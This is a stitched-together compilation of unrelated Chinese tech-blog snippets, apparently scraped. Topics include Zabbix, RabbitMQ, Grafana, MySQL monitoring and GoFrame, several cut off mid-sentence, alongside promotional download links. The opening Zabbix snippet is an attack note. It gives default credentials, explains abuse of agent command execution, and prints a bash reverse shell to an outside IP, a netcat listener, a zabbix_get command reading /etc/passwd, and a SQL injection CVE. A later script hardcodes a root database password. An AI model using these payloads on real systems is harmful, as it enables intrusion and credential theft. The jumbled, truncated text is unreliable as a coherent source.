zabbix

zabbix Zabbix配置不当安全事件 sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627 京东某站shell直入jae内网物理机内核版本过低 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349 Zabbix弱口令利用 zabbix默认的口令为Admin:zabbix,以及存在guest密码为空 Zabbix server可以远程在agent的机器上执行任意命令 建立监控项 zabbix_get命令调用 登录后可以在后台自定义脚本，执行命令。 默认安装后是开启了guest账户的，如果没有禁止，可以通过guest账户登录，查看信息 这个模块是agent自带的，获取服务器shell，获取root权限。 监控项： bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1 nc -lvp 6666 zabbix_get命令调用： zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]' Zabbix注入 latest.php SQL注入漏洞（CVE-2016-10134） Payload: latest.php

之前我们除了zabbix server的一键部署脚本，那么我们在日常生活中更多的是对于agent的部署，那么这么繁琐的工作怎么可以让我们手工去做呢？ 所以波哥写了一个windos和一个linux版本的zabbixAgent部署脚本，老规矩我们都会单独甩出来一个配置文件，然后只要改一下配置文件，再执行一下脚本就可以了。下面我们说说使用方法。 linux版本的参数配置： 目录结构： windos版本的参数配置： 目录结构： windos还可以自动判断是64位系统还是32位系统 修改config，windos的执行bat,linux执行sh文件就行了。 zabbixAgent版本默认选的3.2。 如果想要不同版本的，可以看一下波哥里面的东西，然后自己替换就好了。这个就不给你们写的那么详细了。还希望大家有一定的动手能力哈！ 关注公众号，回复：“zabbix” 获取该脚本 来源： oschina 链接： https://my.oschina.net/u/4325773/blog/3339421

一般而言，如果你选择RabbitMQ，那肯定就是把可靠性放在第一位。毕竟，RabbitMQ可是金融行业消息队列的标配。如果把性能放在第一位，那毫无疑问，必须是Kafka。但是，可靠性毕竟是相对的，就拿大火的阿里云，AWS云，或者传统的IBM小型机，Oracle数据库，没有谁敢说自己可靠性100%，都是说几个9。所以，本文的目的很明确，就是尽可能的提高我们RabbitMQ的可靠性，从发送、存储、消费、集群、监控、告警等多个维度给出可行性方案，指导开发者以及运维人员获取更加可靠的消息投递，保障我们的业务系统安全、可靠、稳定的运行。 数据可靠性是和RabbitMQ节点、生产者、消费者以及服务器等息息相关的。本文比较长，大概分为如下几个段落： 确认机制 生产者 消费者 队列镜像 告警 监控和Metrics 健康检查 如下是一张RabbitMQ架构图，本文对可靠性的分析，会涉及到架构图中的方方面面： 1. 确认机制 当连接出现问题的时候，在客户端和服务端之间的消息可能正在投递中，还没有被Broker接收，它们可能正在被编码或者解码，或者一些其他的情况。在这种场景下，消息并没有被投递，那么它们是需要被重新投递以保障业务稳定性。确认机制让服务端和客户端知道什么时候需要做这些事情，它对于生产者和消费者保障数据安全是非常重要的。 确认机制能被用在两个方向：允许消费者告诉服务器（Broker

今天分享给大家的是阿里15分钟教你开发视觉AI应用， 文末有网盘链接 一、视觉开放平台简介 二、开发前准备 步骤一：开通阿里云视觉智能开放平台 步骤二：开通OSS服务 步骤三：创建密钥并安装Java SDK 三、人脸识别实战教程 1.背景信息 2.前提条件 3.人脸属性识别 4.人体计数 5.人脸搜索 四、口罩识别实战教程 1.前提条件 2.人脸搜索 五 、图片内容安全实战教程 1.背景信息 2.前提条件 3.图片内容安全 点击链接获取完整文档 链接： https://pan.baidu.com/s/1JcIPIco29xxLrm2xV_m_Jg 提取码：p19a ※部分文章来源于网络，如有侵权请联系删除；更多文章和资料|点击后方文字直达 ↓↓↓ 100GPython自学资料包 阿里云K8s实战手册 [阿里云CDN排坑指南] CDN ECS运维指南 DevOps实践手册 Hadoop大数据实战手册 Knative云原生应用开发指南 OSS 运维实战手册 云原生架构白皮书 Zabbix企业级分布式监控系统源码文档 10G大厂面试题戳领 来源： oschina 链接： https://my.oschina.net/u/4601114/blog/4696362

今天跟大家分享的是阿里内部关于运维的Linux的系统诊断案例分析， 文末获取网盘链接 一、Linux 启动与登录问题 1.超详细系统启动与登陆异常排查点 2.grub.conf 文件内容被清空了怎么办 3.巧妙利用 strace 查找丢失的文件 4.小心 PAM 不让你登录 5.CentOS 登录卡住的原因被我找到了 二、Linux 性能问题 1.找到 Linux 虚机 Load 高的“元凶” 2.OOM killer 是被谁触发的 3.我的服务器内存去哪儿了 4.CPU 占用不高但网络性能很差的一个原因 5.一次 IO 异常捕获过程 三、Linux 主机网络问题 1.ifdown ifup 命令丢失处理 2.网络不通？ strace 二度出手 3.TIME_WAIT & CLOSE_WAIT 的讨论总结 4.一次网络抖动经典案例分析 四、Linux 系统服务与参数问题 1.4 个 limits 生效的问题 2.6 步排查 ss& netstat 统计结果不一样的原因 3.为什么明明内存很充足但是 java 程序仍申请不到内存 4.请不要忽略 min_free_kbytes 的设置 五、最后的彩蛋 某地区口罩项目架构演进及优化经验 点击链接获取全文 链接： https://pan.baidu.com/s/1S9xoEU72wIVEN_42KkMgpA 提取码：do8d

之前，我写过几篇有关「线上问题排查」的文章，文中附带了一些监控图，有些读者对此很感兴趣，问我监控系统选型上有没有好的建议？ 目前我所经历的几家公司，监控系统都是自研的。其实业界有很多优秀的开源产品可供选择，能满足绝大部分的监控需求，如果能从中选择一款满足企业当下的诉求，显然最省时省力。 这篇文章，我将对监控体系的基础知识、原理和架构做一次系统性整理，同时还会对几款最常用的开源监控产品做下介绍，以便大家选型时参考。内容包括3部分。 必知必会的监控基础知识 监控系统俗称「第三只眼」，几乎是我们每天都会打交道的系统，下面 4 项基础知识我认为是必须要了解的。 监控系统的7大作用 正所谓「无监控，不运维」，监控系统的地位不言而喻。不管你是监控系统的开发者还是使用者，首先肯定要清楚：监控系统的目标是什么？它能发挥什么作用？ 实时采集监控数据 ：包括硬件、操作系统、中间件、应用程序等各个维度的数据。 实时反馈监控状态 ：通过对采集的数据进行多维度统计和可视化展示，能实时体现监控对象的状态是正常还是异常。 预知故障和告警： 能够提前预知故障风险，并及时发出告警信息。 辅助定位故障： 提供故障发生时的各项指标数据，辅助故障分析和定位。 辅助性能调优： 为性能调优提供数据支持，比如慢SQL，接口响应时间等。 辅助容量规划： 为服务器、中间件以及应用集群的容量规划提供数据支撑。 辅助自动化运维：

一、Grafana介绍 Grafana是一个可视化面板（Dashboard），有着非常漂亮的图表和布局展示，功能齐全的度量仪表盘和图形编辑器，支持Graphite、zabbix、InfluxDB、Prometheus和OpenTSDB作为数据源。Grafana主要特性：灵活丰富的图形化选项；可以混合多种风格；支持白天和夜间模式；多个数据源。 二、安装Grafana CentOS系列使用YUM安装 1 2 $ wget https : / / s3 - us - west - 2.amazonaws.com / grafana - releases / release / grafana - 4.2.0 - 1.x86_64.rpm $ sudo yum localinstall grafana - 4.2.0 - 1.x86_64.rpm 或者 1 2 $ yum install initscripts fontconfig $ rpm - Uvh grafana - 3.1.1 - 1470047149.x86_64.rpm 安装文件 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 # 二进制程序文件 / usr / sbin / grafana - server # init.d脚本 / etc / init .d /

前言：本文是对这篇博客Zabbix: Partitioning MySQL / MariaDB database Tables in 5 min的翻译，翻译如有不当的地方，敬请谅解，请尊重原创和翻译劳动成果，转载的时候请注明出处。谢谢！ 英文地址：https://bestmonitoringtools.com/zabbix-partitioning-tables-on-mysql-database 在本教程中，我们将逐步学习如何使用分区脚本（partitioning script）在MySQL或MariaDB服务器上对Zabbix数据库（history和trends表）进行分区。 Zabbix从主机采集数据并将其存储在history和trends表中，Zabbix的history表中保存原始数据（Zabbix采集的每一个值），trends表中存储每小时内的合并数据，那些数据的平均值、最小值、最大值。 Zabbix的housekeeping进程负责删除trends表和history表中的旧数据。使用delete语句从数据库删除旧数据可能对数据库性能产生负面的性能影响。因此，我们中许多人都收到过令人讨厌的警报 “ Zabbix housekeeper processes more than 75% busy ” 这个问题能够通过数据库分区方案轻松的解决

vim /usr/local/scripts/mysql_status.sh #!/bin/bash #Desc：zabbix 监控 MySQL 状态 #Date：2020-09-05 #by：Luojq #主机 HOST="localhost" #用户 USER="root" #密码 PASSWORD="123456" #端口 PORT="3306" #MySQL连接 CONNECTION="mysqladmin -h ${HOST} -u ${USER} -P ${PORT} -p${PASSWORD}" if [ $# -ne "1" ];then echo "arg error!" fi case $1 in Uptime) result= ${CONNECTION} status 2>/dev/null |awk '{print $2}' echo $result ;; Questions) result= ${CONNECTION} status 2>/dev/null |awk '{print $6}' echo $result ;; Com_update) result= ${CONNECTION} extended-status 2>/dev/null |grep -w "Com_update" |awk '{print $4}' echo $result ;;

GF(Go Frame) 是一款模块化、高性能、生产级的Go基础开发框架。实现了比较完善的基础设施建设以及开发工具链，提供了常用的基础开发模块，如：缓存、日志、队列、数组、集合、容器、定时器、命令行、内存锁、对象池、配置管理、资源管理、数据校验、数据编码、定时任务、数据库 ORM 、TCP/UDP组件、进程管理/通信等等。并提供了Web服务开发的系列核心组件，如：Router、Cookie、Session、Middleware、服务注册、模板引擎等等，支持热重启、热更新、域名绑定、 TLS/HTTPS 、Rewrite等特性。 #特点 · 模块化、松耦合设计； · 模块丰富，开箱即用； · 简便易用，易于维护； · 社区活跃，大牛谦逊低调脾气好； · 高代码质量、高单元测试覆盖率； · 详尽的开发文档及示例； · 完善的本地中文化支持； · 更适合企业及团队使用； #地址 · 主库： https://github.com/gogf/gf · 码云： https://gitee.com/johng/gf #安装 go get -u -v github.com/gogf/gf · 推荐使用 go.mod: require github.com/gogf/gf latest #限制 golang版本 >= 1.11 #架构 ※部分文章来源于网络，如有侵权请联系删除；更多文章和资料